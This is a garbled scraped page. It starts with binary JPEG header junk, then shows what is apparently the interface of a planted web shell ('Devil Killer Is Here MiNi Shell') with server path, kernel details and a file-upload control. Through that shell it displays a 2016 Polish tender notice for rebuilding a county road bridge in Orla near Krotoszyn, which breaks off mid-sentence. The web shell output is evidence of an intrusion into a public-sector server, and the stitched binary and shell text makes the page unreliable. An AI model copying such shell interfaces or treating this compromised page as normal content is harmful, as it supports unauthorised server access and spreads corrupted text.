JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160510/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160510/116082-N-2016.html

<p class="kh_header"><b>Krotoszyn: Przebudowa mostu drogowego położonego w ciągu drogi powiatowej nr 5145P
Koźmin Wlkp-Dobrzyca w miejscowości Orla.</b><br>
<b>Numer ogłoszenia: 116082 - 2016; data zamieszczenia: 10.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Transportowa 1, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7226531, faks 062 7226531.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdkrotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa mostu drogowego położonego w ciągu drogi powiatowej nr 5145P
Koźmin Wlkp-Dobrzyca w miejscowości Orla..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania przetargowego jest wybór Wykonawcy, który będzie świadczyć na rzecz Zamawiającego robotę budowlaną branży mostowej polegającą na przebudowie mostu drogowego położonego w ciągu drogi powiatowej nr 5145P   
Koźmin Wlkp-Dobrzyca w miejscowości Orla.Przedmiot postępowania obejmuje: Wykonanie nowego mostu wymaga całkowitej rozbiórki istniejącej konstrukcji. Nowy obiekt inżynierski zaprojektowano jako konstrukcje z rury stalowej ocynkowanej spiralnie karbowanej ograniczonej obustronnie żelbetową ścianką czołową z betonu B30 C25/30. Typ konstrukcji dobrano tak aby zachować dotychczasowe warunki hydrologiczne oraz usytuowanie wysokościowe i istniejący spadek podłużny cieku. Warstwy konstrukcyjne jezdni przyjęto dla kategorii ruchu KR3. Szerokość jezdni nad obiektem wynosi 6,0 m. Jezdnia ograniczona jest obustronnie krawężnikiem betonowym. Nad obiektem projektuje się ciąg pieszo - rowerowy o szerokości użytkowej 3,5 m. Założono, że ruch pieszych oddzielony będzie od jezdni za pomocą bariery ochronnej stalowej linowej o parametrach H1,B,W4, natomiast od strony skarpy, chodnik zabezpieczony będzie balustradą stalową wg KDM BAL 1.0 wys. 1,2 m. Po drugiej stronie jezdni w odległości 0,5 m od jej krawędzi, zamontowana będzie  w ściance czołowej bariero poręcz stalowa o parametrach H2,B,W3. Przewiduje się wykonanie wszystkich prac przy całkowitym zamknięciu jezdni, natomiast ruch pojazdów skierowany będzie na drogę objazdową.Obliczenia statyczno-wytrzymałościowe prowadzono w oparciu o obowiązujące normy oraz przy założeniu, że obiekt przenosi obciążenia obliczeniowe pojazdem K = 600 kN i obciążenie równomiernie rozłożone o wielkości 3,00 kN/m2 powiększone o współczynnik dynamiczny i współczynniki obciążeniowe co odpowiada klasie B zgodnie z PN-85/S-10030. Obiekty mostowe. Obciążenia. Ze względu na to, że woda w cieku przepływa w sposób ciągły, na czas wykonywania zasadniczej konstrukcji mostu, wodę należy skierować do przepływu tymczasowego np. w postaci połówki rury o średnicy 1000 mm.Opis mostu i warunki wykonania:Konstrukcja nośna oraz posadowienie
Projektuje się wykonanie sprężystej konstrukcji nośnej mostu z rury spiralnie karbowanej typu o przekroju łukowo kołowym i wymiarach przekroju poprzecznego: 2,12 x3,32m światło 5,41 m2, i długości całkowitej 12,86 m zabezpieczoną warstwą cynku o grubości 70 zgodnie z normą PN-EN 10346, można użyć innej konstrukcji o większych zbliżonych parametrach technicznych.Szerokość jezdni nad obiektem wynosi 6,0 m dwa pasy ruchu po 3,0 m. Jezdnia posiada spadek daszkowy o wartości 2% skierowany od osi niwelety. Konstrukcja jezdni składa się z:w-wa ścieralna z SMA11 :gr. 4 cm,w-wa wiążąca: AC16W:gr. 6 cm,podbudowa zasadnicza: AC22P:     gr. 8 cm,podbudowa pomocnicza: kruszywo łamane stabilizowane mechanicznie 0-32: gr. 20 cm.Jezdnia ograniczona jest obustronnie krawężnikiem betonowym 15x30 cm oraz od strony górnej wody ciągiem pieszo-rowerowym o szerokości użytkowej 3,5 m. Na ściance czołowej od strony górnej wody wykonana jest balustrada stalowa typu miejskiego wysokości 1,2 m, natomiast na drugiej ściance od strony dolnej wody zamontowana jest bariero poręcz ochronna o parametrach H2,B,W3. Między jezdnia a ciągiem pieszo rowerowym znajduje się bariera linowa o parametrach H1,B,W4. Posadowienie:Konstrukcja stalowa posadowiona zostanie na fundamencie kruszywom. Materiał fundamentu kruszynowego powinien spełniać wymagania norm z serii PN-B-11110:1996, PN-B-11111:1996, PN-B-11112:1996 Az1:1996, PN-B-11113:1996,PN-B-11114:1996. Fundament kruszywowy należy wykonać z ziaren o uziarnieniu 0-32, grubości 0,45 m, zagęszczony do Is=0,98. Fundament należy wzmocnić geotkaniną polipropylenowa o wytrzymałości na rozciąganie min. 80kN/m w obie strony, wydłużenie max. 24% CBR min. 9,5kN. Geosyntetyki należy układać na podstawie planu, określającego wymiary pasm, kierunek postępu robót, kolejność układania pasm, szerokość zakładów, sposób łączenia, mocowania tymczasowego itp.Wskazany jest kierunek układania pod górę.Geosyntetyki należy tak układać, by pasma leżały poprzecznie do kierunku zasypywania i prostopadle do osi drogi. Minimalny zakład 30 cm.Zasypywanie powinno następować od czoła pasma na ułożony materiał, po czym zasypka jest rozkładana na całej powierzchni odpowiednim urządzeniem, najczęściej spycharką, a tylko wyjątkowo ręcznie. Duże kamienie nie powinny być zrzucane z większej wysokości, by nie niszczyć geosyntetyku. W takim przypadku celowe jest układanie najpierw bezpośrednio na materiale warstwy bez kamieni. Pasma należy układać dachówkowo, aby przesuwanie zasypki nie powodowało podrywania materiału. Niedopuszczalny jest ruch pojazdów gąsienicowych, walców okołkowanych i innych ciężkich maszyn bezpośrednio po ułożonym materiale geotekstylnym. Wymagana jest warstwa zasypki, co najmniej 15cm. Za zgodą Inżyniera można dopuścić ruch ciężkich pojazdów kołowych po materiale, jeśli powstanie kolein powoduje wybranie luzów i napięcie materiału, dzięki czemu lepiej przeciwdziała on odkształceniom gruntu. Koleiny następnie wypełnia się zasypką. Zasypka o frakcji 0-32 powinna być zagęszczona do wskaźnika zagęszczenia Is = 0.98. Zasypka frakcja 0-32 mm powinna być ułożona tak, aby górna jej warstwa o grubości równej wysokości karbu była luźna i karby mogły się w niej zagłębić ok. 2-5 cm. Wymagany wskaźnik różnoziarnistości CU wg PN-86/B-02480 powinien być nie mniejszy niż 4. Wymagany wskaźnik krzywizny CC powinien zawierać się w przedziale 1-3 wg PN-86/B-02480.Kolejność układanych materiałów:na przygotowane podłoże należy ułożyć geotkaninę; następnie na geotkaninie układamy warstwę zasypki;kruszywo zasypki zamykamy warstwą geotkaniny zg. z realizowanym schematem wzmocnienia.Konstrukcję stalową należy obudować zasypką inżynierską. Na zasypkę należy stosować kruszywa spełniające wymagania norm PN-S-02205:1998 i PN-B-11112:1996. Uziarnienie kruszywa zależy od wielkości fali konstrukcji. Zaleca się zastosować mieszankę żwirowo-piaskową o uziarnieniu 0-32 mm, zagęszczona do wskaźnika zagęszczenia min. 0,98% wg Proctora zagęszczana warstwami grubości maksymalnie 30 cm.Grunt należy układać warstwami o grubości około 20-30 cm w zależności od specyfiki sprzętu użytego do zagęszczania, z odpowiednim, bardzo starannym zagęszczeniem. Minimalny wskaźnik zagęszczenia gruntu Is = 0,98. Układanie należy prowadzić symetrycznie, tak aby wysokość zasypki była taka sama po obu stronach rury dopuszcza się różnicę w wysokości równą grubości jednej warstwy.Skarpy nasypu drogowego przy wlocie i wylocie mostu, o pochyleniu 1:1, należy umocnić betonową kostką gr. 8 cm na podsypce cementowo piaskowej 1:4 gr. 5 cm. Umocnienie należy opierać na krawężniku betonowym 15x30 cm na ławie betonowej z oporem z betonu B15 C12/15. W pobliżu rowu przydrożnego od strony górnej wody należy wykonać umocnienie podstawy skarpy nasypu drogowego przez wbicie palisady z kłów średnicy 10 cm i długości 1,5 m. Wlot i wylot rury stalowej zostanie ograniczony żelbetową ścianką czołową grubości 40 cm z betonu B30 C25/30, która posadowiona będzie na ławie fundamentowej 80 x 90 cm. Długość ścianki czołowej wynosi 10,35 m. W gzymsach ścianek zamontowane są: bariero poręcz stalowa oraz stalowa balustrada wg. KDM BAL 1.0 wysokości 1,2 m. Natomiast od strony wlotu na odcinku 3,5 m i od strony wylotu na odcinku 4,0 m dno zostanie umocnione narzutem kamiennym gr. 30 cm na geowłókninie.Szerokość jezdni na obiekcie wynosi 6,0 m. Jezdnia ograniczona jest obustronnie krawężnikiem betonowym 15x30 cm ułożonym na ławie betonowej B15 C12/15 z oporem oraz od strony górnej wody pozostawionym miejscem dla ciągu pieszo rowerowego w obrębie mostu o szerokości użytkowej 3,5 m nawierzchnia gruntowa. Założono, że ruch pieszych oddzielony będzie od jezdni za pomocą bariery ochronnej stalowej linowej o parametrach H1,B,W4. Dojazdy:Wymiana nawierzchni jezdni na dojazdach ma na celu dopasowanie szerokości i rzędnych niwelet istniejącej jezdni do niwelety projektowanej oraz ukształtowanie prawidłowych spadków podłużnych i poprzecznych. Jako elementy bezpieczeństwa ruchu na dojazdach po obu stronach mostu przewidziano zastosowanie drogowych barier ochronnych. Z uwagi na zmianę przebiegu osi jezdni na moście konieczne jest dopasowanie jezdni na dojazdach. Na dojeździe od strony Koźmina Wlkp. należy zastosować ścieki skarpowe zakończone kamiennym umocnieniem. Urządzenia obce:W obrębie planowanych robót nie stwierdzono przebiegu żadnych sieci uzbrojenia podziemnego terenu. W niedalekim sąsiedztwie obiektu, od strony górnej wody znajduje się wodociąg oraz sieć telekomunikacyjna, która nie koliduje z projektowanym zakresem robót.
 Wymagane materiały:Wszystkie materiały zastosowane podczas przebudowy muszą posiadać certyfikat lub deklaracje zgodności z PN lub aprobatą techniczną. Wszystkie wymagania dotyczące wbudowywanych materiałów zawierają Szczegółowe Specyfikacje Techniczne stanowiące integralną część projektu wykonawczego. Kolorystykę poszczególnych elementów należy ustalić z Zamawiającym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający informuje, że nie przewiduje udzielenia w niniejszym postępowaniu przetargowym zamówień uzupełniających , o których mowa w art. 67 ust.1 pkt 6 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  13.000,00  zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dotyczącego posiadanie wiedzy i doświadczenia  Zamawiający oceni jako spełnione, jeżeli Wykonawca należycie wykonał w okresie ostatnich pięciu lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej 1 zadanie polegające na budowie, przebudowie lub remoncie obiektów mostowych o wartości nie mniejszej niż 500.000,00 zł  brutto o treści odpowiadającej załącznikowi  nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego zapisu w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dotyczącego dysponowania osobami zdolnymi do wykonywania zamówienia zostanie dokonana na podstawie wykazu osób przewidzianych do realizacji zamówienia , w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi w specjalności mostowej  wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami o treści odpowiadającej załącznikowi nr 3 do SIWZ. tj. co najmniej:a) kierownik budowy , posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności mostowej w pełnieniu funkcji kierownika budowy na minimum 2 budowach w ciągu 5 lat ,b) pozostali pracownicy wg potrzeb - min. 8  osób</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający oceni jako spełnione jeżeli Wykonawca wykaże ,że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 500.000,00 PLN. W tym celu przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od 
odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował  zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia(art.26 ust.2b ustawy, o treści odpowiadającej załącznikowi nr 7  do SIWZ.W przypadku składania oferty  przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz osób umocowanych przez Wykonawcę konieczne jest złożenie pełnomocnictwa. Pełnomocnictwo winno być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmian treści zawartej umowy w przypadku, gdy konieczność ich  wprowadzenia  wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany mogą dotyczyć okoliczności wynikających z przyczyn technicznych, gospodarczych, finansowych,
organizacyjnych, jeżeli będzie to  konieczne dla uzyskania celu określonego w postanowieniach umowy zawartej z Wykonawcą.Ponadto  dopuszcza się również  możliwość dokonywania zmian postanowień zawartej umowy tj: dopuszcza się zmianę osoby (kierownika budowy) przeznaczonej do realizacji zamówienia przez Wykonawcę w takim przypadku., Wykonawca do realizacji przedmiotu zamówienia zapewnia osoby posiadające kwalifikacje, uprawnienia nie mniejsze niż określone w warunkach udziału w postępowaniu ,dopuszcza się zmianę inspektora nadzoru,działania siły wyższej mającej bezpośredni wpływ na termin wykonania robót (np. klęski żywiołowe, strajki),
